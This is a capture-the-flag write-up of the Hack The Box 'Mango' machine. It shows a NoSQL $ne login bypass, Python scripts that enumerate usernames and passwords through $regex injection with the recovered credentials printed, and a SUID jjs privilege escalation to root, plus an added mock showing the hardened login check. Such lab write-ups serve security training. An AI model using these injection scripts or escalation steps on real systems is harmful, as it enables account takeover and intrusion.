Mango-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: NoSQL database login bypass, NoSQL injection, NoSQL username and password enumeration, SUID privilege escalation, jjs privilege escalation

Reference: https://fdlucifer.github.io/2020/04/20/mango/

Reference: https://0xdf.gitlab.io/2020/04/18/htb-mango.html

0x01 Getting user access

1. Get the target IP address: 10.10.10.162

2. Scan for open ports:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.162
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:35 CST
Warning: 10.10.10.162 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.162
Host is up (1.1s latency).
Not shown: 63824 closed tcp ports (reset), 1708 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 39.51 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,443 -Pn --min-rate=10000 10.10.10.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:36 CST
Nmap scan report for 10.10.10.162
Host is up (0.32s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn:
|_ http/1.1
|_http-title: Mango | Search Base
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.40 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport1 10.10.10.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:37 CST
Warning: 10.10.10.162 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.162
Host is up (0.64s latency).
All 65535 scanned ports on 10.10.10.162 are in ignored states.
Not shown: 65455 open|filtered udp ports (no-response), 80 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 87.38 seconds

3. Bind the discovered domain names locally:

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.162 mango.htb" | sudo tee -a /etc/hosts
10.10.10.162 mango.htb

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.162 staging-order.mango.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.162 staging-order.mango.htb

4. Visit each domain name:

https://mango.htb

https://staging-order.mango.htb

5. Through testing, the staging-order.mango.htb site turns out to be backed by a NoSQL database and is vulnerable to an injection-based login bypass:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#exploits

username[$ne]=shiyan&password[$ne]=shiyan&login=login

6. Try the login bypass:

POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://staging-order.mango.htb
Connection: close
Referer: http://staging-order.mango.htb/
Cookie: PHPSESSID=tn04egm4dh8ov0s168f17e229p
Upgrade-Insecure-Requests: 1

username[$ne]=shiyan&password[$ne]=shiyan&login=login

HTTP/1.1 302 Found
Date: Tue, 09 Jan 2024 13:02:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: home.php
Content-Length: 4022
Connection: close
Content-Type: text/html; charset=UTF-8

7. The response redirects to home.php, and the page carries some hints:

http://staging-order.mango.htb/home.php

Under Plantation
Sorry for the inconvenience. We just started farming!
To contact us in the meantime please email: admin@mango.htb
We rarely look at our inboxes.

8. This part tests NoSQL injection: extracting the target's usernames and passwords. The enumeration steps follow.

Replacing a.* with b.* returns a 200 response, which means no username contains the letter b. Write a script that uses this logic to discover usernames.

from requests import post
from string import lowercase

url = 'http://staging-order.mango.htb/'

def sendPayload():
    # Probe one letter at a time: the unanchored regex 'a.*' matches any
    # username containing that letter, and a 302 redirect means a user matched.
    for char in lowercase:
        regex = '{}.*'.format(char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            print "Found valid letter: {}".format(char)

def getUser():
    sendPayload()

if __name__ == '__main__':
    getUser()
┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum.py
Found valid letter: a
Found valid letter: d
Found valid letter: g
Found valid letter: i
Found valid letter: m
Found valid letter: n
Found valid letter: o

The script found 7 valid characters: a, d, g, i, m, n and o. With the character set reduced, we can try to reveal the actual usernames. The caret ^ in a regex anchors the start of the string: the pattern ^a.* is true only if a username starts with a, ^ad.* is true only if a username starting with ad exists, and so on. Update the script with this logic.

from requests import post

url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']

def sendPayload(word):
    # Anchored regex: 302 only if some username starts with this prefix.
    regex = '^{}.*'.format(word)
    data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
    response = post(url, data = data, allow_redirects=False)
    if response.status_code == 302:
        return word
    else:
        return None

def getUser():
    for char in valid:
        if sendPayload(char) is not None:
            print "Found username starting with {}".format(char)

if __name__ == '__main__':
    getUser()

The script loops over the character set looking for usernames that start with any of these letters.
Running it gives the following output:

┌──(kali㉿kali)-[~/桌面]
└─$ touch enum1.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum1.py
Found username starting with a
Found username starting with m

The database contains usernames starting with a and with m. Update the script to reveal the full usernames.

from requests import post

url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']

def sendPayload(word):
    # Try each candidate letter as the next character after the known prefix.
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None

def getUser():
    # Extend each prefix one character at a time until no candidate matches.
    for ch in ['a', 'm']:
        username = ch
        while True:
            char = sendPayload(username)
            if char is not None:
                username += char
            else:
                print "Username found: {}".format(username)
                break

if __name__ == '__main__':
    getUser()
┌──(kali㉿kali)-[~/桌面]
└─$ touch enum2.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum2.py
Username found: admin
Username found: mango

The script loops over the valid characters and builds up the usernames that start with a and m.

An HTTP response with status code 302 (a redirect) means the probed character is valid; the script's output is shown above.

Two valid usernames were identified, admin and mango. The same logic can be used to recover their passwords.

Modify the script as follows:

from requests import post
from string import printable

url = 'http://staging-order.mango.htb/'

def sendPayload(user):
    # With the username fixed, find which printable characters occur anywhere
    # in that user's password (unanchored regex, 302 = match). Characters are
    # sent unescaped here, so regex metacharacters such as ( [ * yield an
    # invalid pattern and never show up as valid; escaping is handled later.
    valid = []
    for char in printable:
        regex = '{}.*'.format(char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            valid.append(char)
    return valid

def getUser():
    for user in ['admin', 'mango']:
        valid = sendPayload(user)
        print "Valid characters for {}: {}".format(user, valid)

if __name__ == '__main__':
    getUser()
┌──(kali㉿kali)-[~/桌面]
└─$ touch enum3.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum3.py
Valid characters for admin: ['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '$', '.', '>', '\\', '^', '|']
Valid characters for mango: ['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '$', '.', '\\', ']', '^', '{', '|', '~']

Building on the character sets fuzzed out by the Python script above, brute-force the two users' passwords.
Now that the character set of each password is known, update the script to recover the passwords. The characters ^, $, |, \ and . must be escaped with a backslash, because they have special meaning in a regex and would otherwise produce false negatives.

Modify the script in the same way as the username enumeration script:

from requests import post

url = 'http://staging-order.mango.htb/'
# Character sets from the previous run, with regex metacharacters escaped
# so they match literally instead of being interpreted by the regex engine.
admin_pass = ['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '\\$', '\\.', '>', '\\\\', '\\^', '\\|']
mango_pass = ['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '\\$', '\\.', '\\\\', ']', '\\^', '{', '\\|', '~']

def sendPayload(user, word):
    valid = admin_pass if user == 'admin' else mango_pass
    # Anchored regex: 302 only if the password starts with prefix + candidate.
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None

def getUser():
    for user in ['admin', 'mango']:
        password = ''
        while True:
            char = sendPayload(user, password)
            if char is not None:
                password += char
            else:
                print "Password for {} found: {}".format(user, password)
                break

if __name__ == '__main__':
    getUser()
┌──(kali㉿kali)-[~/桌面]
└─$ touch enum4.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum4.py
Password for admin found: t9KcS3>!0B#2
Password for mango found: h3mXK8RhU~f{]f5H
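The login bypass in step 6 and the username and password enumeration in step 8 rest on the same flaw: the form fields reach the MongoDB query without being checked for type, so a key such as username[$ne] arrives as an operator document instead of a string. The Python 3 example below is added here and is not the original post's code; it mocks that login check against a constructed in-memory user list (the credentials are made up), reproduces the $ne bypass and the $regex probing against it, and shows the hardened check that rejects anything but plain strings.

```python
import re
from urllib.parse import parse_qsl

# Constructed stand-in for the users collection behind the login form.
# The credentials below are made up for this demo.
USERS = [{"username": "admin", "password": "s3cret!"},
         {"username": "mango", "password": "fruit{1}"}]

def php_parse(body):
    """Mimic PHP's $_POST: 'username[$ne]=x' becomes {'username': {'$ne': 'x'}}."""
    params = {}
    for key, value in parse_qsl(body):
        m = re.fullmatch(r"(\w+)\[([^\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params

def match(cond, actual):
    """Evaluate one field condition the way the driver hands it to MongoDB:
    a plain string is an equality test, a dict is an operator document."""
    if isinstance(cond, str):
        return actual == cond
    for op, arg in cond.items():
        if op == "$ne":
            if actual == arg:
                return False
        elif op == "$regex":
            if not re.search(arg, actual):
                return False
        else:
            return False  # operators not modelled here never match
    return True

def login_vulnerable(body):
    """Passes the decoded form straight into the query, as the staging site does."""
    p = php_parse(body)
    return any(match(p.get("username", ""), u["username"])
               and match(p.get("password", ""), u["password"]) for u in USERS)

def login_hardened(body):
    """Accepts only plain strings, so operator documents cannot be injected."""
    p = php_parse(body)
    user, pw = p.get("username"), p.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return any(u["username"] == user and u["password"] == pw for u in USERS)
```

The same effect is obtained in PHP by casting the fields with (string) or rejecting is_array() input before building the query.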

9. At this point we have enumerated the account and password we need:

mango

h3mXK8RhU~f{]f5H

10. Log in over SSH:

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ED25519 key fingerprint is SHA256:tzYGTA/kNsB/kThvsmrv2uxaUS/2zS/grRQkrbN4+RE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ED25519) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Jan 9 13:47:24 UTC 2024

System load: 0.0 Processes: 101
Usage of /: 57.8% of 5.29GB Users logged in: 0
Memory usage: 14% IP address for eth0: 10.10.10.162
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

118 packages can be updated.
18 updates are security updates.


Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ id
uid=1000(mango) gid=1000(mango) groups=1000(mango)
mango@mango:~$ pwd
/home/mango
mango@mango:~$ ls
mango@mango:~$

11. Get the first flag (user.txt):

mango@mango:~$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Oct 23 13:17 .
drwxr-xr-x 23 root root 4096 Oct 23 13:17 ..
drwxr-xr-x 2 admin admin 4096 Oct 23 13:18 admin
drwxr-xr-x 4 mango mango 4096 Oct 23 13:17 mango
mango@mango:~$ su admin
Password: t9KcS3>!0B#2
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ pwd
/home/mango
$ cd ~
$ pwd
/home/admin
$ ls
user.txt
$ cat user.txt
0e9d93bd5a3112edae1f27db5e702022
$

0x02 Getting root

12. Use Python to get an interactive shell:

$ 
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/admin$
admin@mango:/home/admin$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Oct 23 13:18 .
drwxr-xr-x 4 root root 4096 Oct 23 13:17 ..
lrwxrwxrwx 1 admin admin 9 Sep 27 2019 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile
-r-------- 1 admin admin 33 Jan 9 12:27 user.txt

13. Check sudo rights:

admin@mango:/home/admin$ sudo -l
[sudo] password for admin:
Sorry, user admin may not run sudo on mango.
admin@mango:/home/admin$ su mango
Password:
mango@mango:/home/admin$ sudo -l
[sudo] password for mango:
Sorry, user mango may not run sudo on mango.
mango@mango:/home/admin$

14. Search for SUID binaries:

mango@mango:/home/admin$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
mango@mango:/home/admin$

15. One unusual binary stands out:

/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

mango@mango:/home/admin$ ls -la /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

16. GTFOBins documents the privilege escalation method for jjs:

https://gtfobins.github.io/gtfobins/jjs/

17. Switch user and attempt the escalation:

mango@mango:~$ su admin
Password:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/mango$
admin@mango:/home/mango$
admin@mango:/home/mango$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
For()Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').wait
0
For()Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').wait
0
jjs>
jjs> exit
function exit() { [native code] }
jjs> quit
function quit() { [native code] }
jjs>
admin@mango:/home/mango$ cd /tmp
admin@mango:/tmp$ ls
hsperfdata_root
mongodb-27017.sock
sh
systemd-private-80e8520757ca4ca296157726a81fa8f1-apache2.service-dXww2S
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-resolved.service-7GqmTu
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-timesyncd.service-Zu3sDz
vmware-root_414-592089511
admin@mango:/tmp$ ./sh -p
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
or() Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitF
0
jjs>
$ ls
hsperfdata_root
mongodb-27017.sock
sh
systemd-private-80e8520757ca4ca296157726a81fa8f1-apache2.service-dXww2S
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-resolved.service-7GqmTu
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-timesyncd.service-Zu3sDz
vmware-root_414-592089511
$ ./sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)

18. Get the final flag (root.txt):

# cat /root/root.txt
4899beb8bf4411fd8efaecf0b5bf9460
#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/214


https://sh1yan.top/2024/01/09/Mango-htb-writeup/
Author: shiyan
Published: 9 January 2024